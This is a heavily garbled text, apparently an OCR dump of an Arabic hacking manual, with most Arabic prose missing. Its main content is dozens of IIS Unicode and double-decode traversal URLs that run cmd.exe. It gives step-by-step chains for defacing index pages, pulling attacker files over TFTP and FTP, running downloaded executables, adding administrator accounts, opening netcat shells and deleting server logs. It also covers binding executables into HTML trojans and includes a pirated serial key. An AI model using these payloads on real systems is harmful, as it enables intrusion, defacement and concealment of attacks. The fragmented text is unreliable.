(Organization for Standardization
** .
ransmission Control .
... Protocol TC
.
. ...
:
Ping Traceroute, DNS lookup,
Finger, Whois, LDAP, SNMP
.
. ... WIN NT :
TCP/IP . ...
. UNIX .
Router .
269
... .
). ( Router
: .
.
.....
... .
.
...
...
. :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
270
271
TCP/IP
HTTPort
( Proxy
) Server ISP
) )
Proxy .
HTTPort
. .
. SOCKS.
.
...
272
273
274
275
276
...
( Anonymous)
18
: ... .
AnalogX Proxy
HTTP (web), HTTPS :
(secure web), POP3 (recieve mail),
SMTP (send mail), NNTP
(newsgroups), FTP (file transfer),
and Socks4/4a and partial Socks5
(no UDP) protocols! It works great
with Internet Explorer, Netscape,
AOL, AOL Instant Messenger,
Microsoft Messenger, and many
!more
277
http://www.analogx.com/files/proxyi
.exe
PortBlocker :
.
:
PortBlocker is configured to block
the most common types of servers
that might be on a system (FTP,
HTTP, etc), so will not require any
modification for most users. If you
are running a special server of
some sort, then you can easily add
278
PortBlocker
http://www.analogx.com/files/pblock
i.exe
279
.
...
.
...
...
Proxy Log Analyzer :
:
280
MB 1.07 :
http://www.mechanicalminds.com/s
oftware/pla/setup.exe
ZIP archive instructions 818 kb
http://www.mechanicalminds.com/s
oftware/pla/pla.zip
281
.
Provides a space for you to type the
address and port number of the
proxy server you want to use to
gain access to the Internet over
HTTP, Secure, FTP, Gopher, and
.Socks protocols
: .
.
282
...
.
:
-----------------------HTTPort 3snf
-----------------------:
-----------------------
,,,,,,,,,,,,
------------------------
-----------------------http://www.angelfire.com/tv2/
ssdd63/httport3snf.zip
284
------------------------
:
------------------------ .
FAHAD
285
Port mapping
286
Add
New mapping
.
287
. .
Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN
288
Proxy
,,,
Start
289
127.0.0.1
80
..
290
291
292
:
XDQG-2ZKN-X2PA-KTRQ
293
"
"
> <
294
> :<
:
=) (=
^^^^^^^^^^^^^^^^^^^
/http://www.netcraft.com
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
.
/http://www.almodammer.com
.
dfl;kjgk'dgjbumpipt@almodammer.c
om
295
Headers
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners
..
Telnet Client
.
FTP 21
TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
296
= XXX
.
:
Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255
298
: ) data list or packet.
( Nodes TTL 1
tracert
traceroute
tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Windows
299
:
) N-Stealth
...(
=============
( Shadow Sceurity Scanner
(
=============
( SuperScan
List (
----------------------------------------------------------------------- Linux
Nmap
) Network Maper
(
Linux
300
//
:
nmap
/
l] Nmap V. 3.00 Usage: nmap [Scan]
[Type(s)] [Options
Some Common Scan Types ('*'
(options require root privileges
sS TCP SYN stealth port scan- *
(((default if privileged (root
sT TCP connect() port scan (default(for unprivileged users
sU UDP port scan- *
sP ping scan (Find any reachable(machines
sF,-sX,-sN Stealth FIN, Xmas, or- *
(Null scan (experts only
sR/-I RPC/Identd scan (use with(other scan types
Some Common Options (none are
:(required, most can be combined
O Use TCP/IP fingerprinting to- *
301
network interface
interactive Go into interactive-(mode (then press h for help
Example: nmap -v -sS -O
http://www.my.com/ 192.168.0.0/16
'*.*.'192.88-90
SEE THE MAN PAGE FOR MANY
MORE OPTIONS, DESCRIPTIONS,
AND EXAMPLES
!!!!!!!!!
man
page ..
nmap -sS -O -vv almodammer.com
=almodammer.com
.......
^^^^^^^^^^^^^^^^^^^
=( (=
^^^^^^^^^^^^^^^^^^^
303
Linux Shell
Account
Linux Shell
.
Linux
whois
Linux
man whois
----------------------------------------------------------------- google
?http://www.google.com/search
q=whois&btnG=Google+Search
.
cgi.
netcraft ..............
304
305
"
"
> <
>>P @ LH@CKERZ :
306
1
//:http
:
\
/http://www.XXX.com
/
2
3
4
5
6
7
307
8
9
10
11
11 10 :
12
:
.
.
308
"
) ( "
><
><sNiper_hEx :
309
) 13
( -:
. . . .
. CMD
.
. ECHO
CMD .
Access Denied
.
. FTP
310
.
. TFTP
.
311
.
IIS4.0 /
IIS5.0 . NT4 / Win2k
.
anonymous person
.
.
. -:
-1
312
.
. .
-2
.
.
. IIS4 / IIS5
CMD
.
. CMD
CMD
-:
313
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+md+c:\hEx
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+rd+c:\hEx
:
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+copy+c:\winnt\sy
314
stem32\cmd.exe+c:\inetpub\
scripts\hEx.exe
:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+move+c:\winnt\s
ystem32\cmd.exe+c:\inetpub
\scripts\hEx.exe+c:\
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+del+c:\hEx.mdb
:
http://www.xxxx.com/msadc
315
/..
%c0%af../winnt/system32/c
md.exe?/c+ren+c:\index.htm
+hEx.htm
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+type+c:\hEx.txt
:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+echo+sNiper_hEx
+>c:\hEx.txt
316
:
:
http://www.xxxx.com/msadc
/hEx.mdb
.
-:
http://www.xxxx.com/scripts
/..
%c1%1c../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
317
%c0%9v../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c0%af../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c0%qf../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c1%8s../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c1%9c../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
318
%c1%pc../winnt/system32/c
\:md.exe?/c+dir +c
-:
Msadc , _vti_bin , iisadmpwd ,
_vit_admin , scripts ,
samples , cgi-bin
. ECHO
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd.exe?/c+dir+c
319
w3svc.exe
inetpub\scripts
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\w3svc.exe
w3svc.exe
inetpub\scripts
-:
http://www.xxxx.com/scrip
\:ts/w3svc.exe?/c+dir+c
320
inetpub\wwwroot\index.ht
m
-:
http://www.xxxx.com/scrip
ts/w3svc.exe?/c+echo+Hac
ked+By+sNiper_hEx+hExRa
y@Hotmail.com+>+c:\inetp
ub\wwwroot\index.htm
CMD .
CMD
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
cmd.exe?
c+copy+c:\winnt\system32
321
\cmd.exe+c:\inetpub\script
s\cmd1.exe
. CMD
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd1.exe?c+dir+c
Access Denied .
Access Denied
Access Denied
-:
-1 CMD
CMD1
. Copy.
-:
322
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\cmd1.exe
-2 ssinc.dll
-:
o test.shtml
o
wwwroot/hEx/test.shtml
o >!#--
<--"include file="AAAA[...]AA
A
2049 .
o
http://www.xxxx.com/test.sht
ml
o .
323
o
. Access Denied
o 500
.
-3 . NC.exe
Temp
Temp .
-4
.
.
-5 root.exe :
sensepost.exe shell.exe
w3svc.exe
c:\inetpub\scripts
.
324
. FTP
Scripts CMD -1
Shell.exe
/
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\shell.exe
mspft.pll -2
open Echo
. ftp.host.com
. FTP
/
c+echo+open+ftp.host.com+
>+c:\winnt\mspft.ppl
-3
Anonymous
mspft.pll
/
shell.exe?/c+echo+anonymo
us+>>+c:\winnt\mspft.ppl
325
-4
hExRay@Hotmail.Com
mspft.pll
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl
. Anonymous User -5
mspft.pll
/
shell.exe?/c+echo+user+an
onymous+>>+c:\winnt\msp
ft.ppl
-6
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl
326
.g
/
shell.exe?/c+echo+lcd+c:\in
etpub\wwwroot+>>+c:\win
nt\mspft.ppl
-8 FTP
. FTP Get
index.htm
/
shell.exe?/c+echo+get+inde
x.html+>>+c:\winnt\mspft.
ppl
-9 Quit
/
>>shell.exe?/c+echo+quit+
+c:\winnt\mspft.ppl
-10 FTP.exe?+"-
s:c:winnt\mspft.ppl
mspft.ppl -:
327
Open FTP.host.com Anonymous hEx@Hotmail.Com User Anonymous hEx@Hotmail.Com Get index.html Quit msadc/..%c0%af../../
%c0%af../winnt/system32/
ftp.exe?+""s:c:\winnt\mspft.ppl
.
Microsoft )
. ( Access L0phtCrack
-:
\ _ .SAM
328
\winnt\repair
L0phtCrack
-:
PASSFILT.DLL
-:
HKEY_LOCAL_MACHINE\SYS
TEM\CurrentControlSet\Cont
rol\Lsa\SYSTEM32\PASSFIL
T.DLL
329
. ASP
MySQL
) ( htr.+
-:
http://www.xxxx.com/defa
ult.asp+.htr
database.inc
.
.
. TFTP
-1
index.htm \:c
330
-2 TFTP
.
331
c+tftp.exe+"-/
i"+1.1.1.1+GET+index.ht
m+C:\inetpub\wwwroot
\index.htm
.
tftp.ex
e
.
""i-
1.1.1.1
.
GET
index.
htm
\
inetpu
b\ww
\wroot
index.
332
htm
.
Log
System32 -:
/
c+del+c:/winnt/system32/lo
gfiles/*.log
333
"
) ( "
> . <
334
..
..
:
------------- )(
. cmd cmd1
:
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exe
.. Echo
CMD1.exe
) ( !
..
IWAM_USER .
Guest
. IIS
335
Guest
!! (:
(: * nix Microsot
(:
Administrator
(:
..
.
(: .
..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:
336
:
Sechole - 1
.. )
(
..
. . . (:
Tlist - 2.
.. +
(:
Kill.exe -3 .
.
NCX99 -3 NC
99
TFTP32.exe -4 ..
(:
:
337
..
ncx99.exe :
http://target/scripts/..../winnt/syst
em32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD =
. Guest
.. TLIST
..
PID ..
..
PID
..
Kill :
.. KILL.exe PID PID (:
!
..
Sechole ..
338
. ..
(: Sechole.exe .
IWAM_USER
.. Administrators
. Access Denided
:
+C+Echo+Hacked+by+XDeMoNX
< C;\inetpub\wwwroot\index+
htm.
..
... (:
:
IWAM_USER
339
: ..
!
.
.
(: .. .
Administrator
.
!! (: (:
:
net user Demon pass /add && net
localgroup administrators Demon
/add Save as . add.bat
: .
Demon Pass
(: ..
add.bat
) (
(:
.. (:
340
(:
)
!(
.
..
netstat -an
..
(:
90%
(: 139
(:
(:
.. . (:
.
..
. GUI
341
..
GEtAdmin Sechole2
.. WINvnc
342
"
"
343
><
> : <
:
(1
(2 TFTPD
(3
=============================
====================
=============================
====================
(1
/http://www.devil2k.com
)) ((
msadc/..%255c../..%255c../../
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
344
msadc/../
%25%35%63../..%25%35%63../..%25
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/..%255c..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
msadc/../
%25%35%63..%25%35%63..%25%35
%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/..%252f..%252f..%252f../
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
345
msadc/..%255c../..%255c../../
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
msadc/..%%35c../..%%35c../..%/
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
msadc/..%%35%63../..%/
%35%63../..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/../
%25%35%63../..%25%35%63../..%25
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
MSADC/..%255c..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
MSADC/..%%35c..%%35c..%%35c../
%
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
346
MSADC/..%%35%63..%%35%63..%/
%35%63..%
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
MSADC/../
%25%35%63..%25%35%63..%25%35
%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
vti_bin/..%255c..%255c..%255c.._/
%255c..
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
vti_bin/..%%35c..%%35c..%%35c.._/
%%35c..%
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
vti_bin/..%%35%63..%%35%63..%_/
%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35
347
%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
PBServer/..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
PBServer/..%%35c..%%35c..%/
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
PBServer/..%%35%63..%/
%35%63..%
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
PBServer/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
Rpc/..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
Rpc/..%%35c..%%35c..%/
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
348
Rpc/..%%35%63..%%35%63..%/
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
vti_bin/..%255c..%255c..%255c.._/
%255c..
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
vti_bin/..%%35c..%%35c..%%35c.._/
%%35c..%
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
vti_bin/..%%35%63..%%35%63..%_/
%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35
349
%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
samples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
cgi-bin/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
iisadmpwd/..%252f..%252f..%252f../
%252f..%252f..
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
vti_cnf/..%255c..%255c..%255c.._/
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
adsamples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
350
scripts/..%C1%1C..%C1%1C../
%C1%1C..
%C1%1Cwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%C1%9C..%C1%9C../
%C1%9C..
%C1%9Cwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%C0%AF..%C0%AF../
%C0%AF..
%C0%AFwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%252f..%252f..%252f../
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
351
scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%pc../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
352
vti_bin/..%c0%af../..%c0%af../.._/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%pc../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
353
scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%e0%80%af../winnt/system32/cmd.e
\:xe?/c+dir+c
scripts/../
%f0%80%80%af../winnt/system32/c
\:md.exe?/c+dir+c
scripts/../
%f8%80%80%80%af../winnt/system3
\:2/cmd.exe?/c+dir+c
scripts/..%fc/
%80%80%80%80%af../winnt/system
\:32/cmd.exe?/c+dir+c
354
msadc/..\%e0\%80\%af../..\/
%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.
\:exe\?/c+dir+c
cgi-bin/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
samples/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
iisadmpwd/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
vti_cnf/..%c0%af..%c0%af.._/
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
vti_bin/..%c0%af..%c0%af.._/
%c0%af..%c0%af..
355
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
adsamples/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
(2 TFTPD
/http://iisbughelp.4t.com
(3
) (
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
\C:
356
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+D
\D:
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+E
\E:
.
)) ((
(1 msadc
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
(2 _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
357
IIS )) ((
:
C:\Inetpub\wwwroot
D:\Inetpub\wwwroot
E:\Inetpub\wwwroot
C
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+dir+C:\Inetpub\wwwroot
358
)
( wwwroot
wwwroot
.
index.htm
)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
wwwroot index.htm
.
359
. index.htm
ss.htm
. c+dir c+ren
))
Dos Command
Prompt
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
index.htm
ss.htm
(:
A
!!!Hacked
index.htm
360
TFTP
. TFTP
)
(
\ C:
index.htm \C:
\C:
C:\inetpub\wwwroot
))
(( TFTP
.
361
TFTP
)) (( .
:
tftp.exe -i XXX.XXX.XXX.XXX get
index.htm
C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX
((
.
index.htm
wwwroot
:
362
"tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm
(:
TFTP
index.htm
:
msadc/..%c1%9c../..%c1%9c../../
?%c1%9c../winnt/system32/cmd.exe
"/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm
)) (( (:
: . EXE
:
EXE
hunter.exe
363
:
.
C:\ index.htm
:
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+tftp.exe+"i"+XXX.XXX.XXX.XXX+GET+hunter.
exe+C:\hunter.exe
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../hunter.exe
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+hunter.exe
364
*.log
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.log/s
tmp
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.tmp/s
))
((
bat
365
. .
))
(( system32
_______________________________
_______________________________
__________________
:
tftp
))
(( system32
)) ((
.
.
IIS Secure IIS
Eeye
366
)) ((
%90 . IIS
)) .
(( .
IIS
..
.. .
.
-------- - :
--------
IIS4.0 IIS5.0 80
)) (( .
------------ - :
------------ CGI-Scanner -1 .. Whisker
) :
( www.wiretrip.net/rfp
-2 )
:
( /http://www.activestate.com
368
-3 ) ( .. IIS
#########################
#########################
#########################
###########
# Game Starts !#
###########
. Administrator
NC.exe IIS Hack.exe
. /http://www.technotronic.com
..
nc.exe
) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe
http://www.target.com/ 80
your_IP/ncx.exe
. :
/c:\>nc http://www.target.com
eGG SheLL
: IIS4.0
)) (( .
do you want me to explain what to
do next, hey common you must be
kidding
370
....hehe...
-------------------------------------372
-------------- : Null.htw
----------- ..
..
373
.. ASP
:
?http://www.victim.com/null.htw
CiWe...HiliteType=full
. Default.asp
, :
iissamples/issamples/oop/qfullhit.ht
w
iissamples/issamples/oop/qsumrhit.
htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.ht
w
.
.. LC3
Global.asa
http://www.victim.com/default.asp::
$DATA
-----------------------------------
..
.. .
..
ISM.dll
)( 20%
. Space
:
http://www.victim.com/global.asa
%20(...<=230)global.asa.htr
<=230. 230
.. %20
.. IIS 4.0&5.0
. ,
ISM.dll
..
..
. .
377
----------: htr.+
-------- .
. ASP
:
http://www.victim.com/global.asa+.h
tr
------------- : site.csc
-----------
DNS DSN, UID
.. and PASS Database
:
http://www.victim.com/adsamples/c
onfig/site.csc
378
. ..
.
"
"UniCode
> <
><Dark Devil :
379
. ::
.
.
)
.... (
.
)( Trust Me
::
:
====
Found On 15 May 2001 BY
380
NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
::
)
IUSR_machinename
( account
cgi
) DeCode
(
::
http://iisserver/scripts/..%5c..
381
<=== %...md.exe?/c+dir+c
<==== /http://iisserver
* - /scripts/
)
( .
cgi
( executable directory
iis
:: iis
executable directory
)
(
382
* <=== winnt/system32/cmd.exe
cmd
)
cmd . ping
netstat .... traceroute
(
* - . .
) (
.
argument
copy .
argument /c c/
:: 2000
cmd ) (?/ cmd
, .
383
::
Starts a new instance of the
Windows 2000 command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON |
/E:OFF] [/F:ON | /F:OFF] [/V:ON |
[/V:OFF
[S] [/C | /K] string/]]
C Carries out the command/
specified by string and then
terminates
K Carries out the command/
specified by string but remains
S Modifies the treatment of string/
(after /C or /K (see below
Q Turns echo off/
D Disable execution of AutoRun/
commands from registry (see
(below
::
384
echo
arguments
)
c/ ( k/
on off
cmd )
(
MCSE
arguments
c/
.
, cmd.exe
:: .
Ping.exe+PRINT cmd.exe?/c
386
). ( enjoy this ::
http://issserver/scripts/..%5c..
%.../ping.exe+PRINT
* - +c/ c/
argument cmd.exe
cmd + /
c .
+
.
**
. )
(
decode
simplyfiey
::
387
%255c..%255c../
..../
iis check
iis
check
. iis
check
check
( slash) /
::
388
computer logic
HexaDecimal
Values values
/ hex value
::
20% : )(space
hex values
,
hex values
decode
( slash) /
::
hex value = /
, 5c%
/ value
389
iis
value
hexadecimal values
::
%25 = %
%35 = 5
c = %63
iis checker
/
.
simplify
390
::
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
c = = %63 5 = %35 % = % %%35%63
%5c
%63 5 = %35 % = %25 %25%35%63
= c = %5c
/= 5c% :
5c% / = 5c%
iis
. checker
::
http://iisserver/scripts/..%5c..
%...xe?/c+dir+c:+/s
391
s/+
.
MCSE
) (
2000
.WIN2000 RESOURCE KIT
392
"
"
> : <
..
. .
.....
******************
393
...
.
.....
.
2000 .
. . IIS :
*1 .
*2 .
*3 "
".
*4 .IIS
..
:
wwwroot
Inetpub
IIS
/http://127.0.01
394
/http://127.0.0.1
.
"
"
> <
395
><De\/iL Ni9hT :
= =-,,,
)),,,,((
=-
=-
.. =-
=-
396
=-
= =
)) ((
397
-1
)) ((
-2
/http://www.name.8m.com
.
FreeServerS
))....8m.s5
)) ((
))
((
398
))
((
=-
IE 5 IE 5.5
399
)) "
"((
,,,,
keykey2000
.
http://www.mikkotech.com/kk2000pr
o.exe
400
SN: K100-43-109-0793218E876A4C9-29
godwill
. 5
))5.5 ((
http://www.thecorpz.org/activex/gw
package.zip
==================== ====
=================
.
401
enter
Upx ))
((
Html .
General options
enter exe file
))
((
enter html
use default
402
page.
HTA File Name
Done. ))
((
http://www.thecorpz.org/html/active
sploits.html
===================
403
====================
.
. .
))
,,((
.
" "
> <
><Linux Girl :
404
) ( cookies
. .
..
...
. :
-1 .
-2 .
-3 .
-4 : .
.
405
.
.
IP
. .
Log Files
.
.
406
.
.
"
"
.
.
.
.
.
:
...
407
: :
. setcookie
:
:code
:
408
: name ...
.
: value ... ...
...
... :
. serialize
.
unserialize .
: expire )
1 ( 1970 .
. ... :
<- :
.
<- : .
.
<- : 409
. .
:
:code
>?
setcookie('site','http://www.palhack
;(erz.com/',time()+3600
?<
time
) 1 . (1970
:
.
410
:
:code
>?
;(setcookie('site','',time()-360000
?<
:
-1
. .
-2
.
:
setcookie
.. :
:code
411
<html>
<body>
?>
setcookie('site','palhackerz.com',tim
;(e()+20000
echo " Alfjr.com : the best islamic
;"forum
<?
<body/>
<html/>
412
413
:
..
.
.
. PHP ...
$_COOKIE
Associative Arrays
.
:
:code
>?
414
;['echo $_COOKIE['site
?<
:
:code
palhackerz.com
:
. .
..
-1 : user.php. :
<- : . <- :
-2 index.php
. user.php
415
:
: user.php -1
:code
?>
-----------------------*/
Cookies-Based Background
..Selector
Created By :
<"Rasha"<rasha@h4palestine.com
For : h4palestine.com
/*-------------------------
416
}()function display_form
<?
<html>
<body>
<-- Color setting Form --!>
form name=color_select>
<"method="GET
INPUT type="hidden" name="do">
<"value="set_color
INPUT name="color" type="text">
"=value
<"<? ;()echo get_color ?>
417
418
}()function set_color
;global $_GET
setcookie('color',
;($_GET['color'],time()+36000
;('header('Location:index.php
}()function get_color
419
;global $_COOKIE
}((['if(isset($_COOKIE['color
;['return $_COOKIE['color
}else{
;"return "#FFFFFF
{
{
}()function clear_color
setcookie('color',
;($_GET['color'],time()-36000
420
;('header('Location:index.php
{
selection //
}('if ($do=='display_form
;()display_form
}("elseif ($do=="set_color{
;()set_color
}("elseif ($do=="clear_color{
;()clear_color
421
{
?<
display_form. .
set_color. .
.
get_color
.
clear_color. .
-2 : index.php
get_color
user.php :
:code
422
<html>
BODY bgcolor="<?>
;('include('user.php
<"<? ()echo get_color
<h1/>..... < h1>
<br>
<br>
a href="user.php?>
"< do=display_form
<a/>
423
<body/>
<html/>
424
425
" God
Will "
> <
> : <
:
** html .
** ).
34 (
** Godwill .
:
_http://www.geocities.com/love2002
il/godwill16.zip
tlsecurity :
:
html
Godwill
...
426
html ...
427
General Options
...
428
Done
...
429
Gen
...enter Output 3
...
/http://www.tripod.lycos.co.uk
...
....
) ( zone Alarm
.
430
...
...
.
"
"NOOP4
> <
>< .MoHfOx. :
431
god will
.
.. godwill
noob 4.0
=============================
==========
=============================
-1
432
========
=============================
==
=============================
layout 2<<<<====:::
6
-2 Internet
Explorer 5
-3 Internet
Explorer5.5
4 5
433
-6 .
=============================
=====================
===================
executable file 3
<<<<====:::
-7
-8
434
=============================
==========
=============================
-9
<<<<====:::
435
...
436
"
"
><
><. ( T.O.L. ( DeXXa :
:
* . .
* FrontPage Server
Extensions .
437
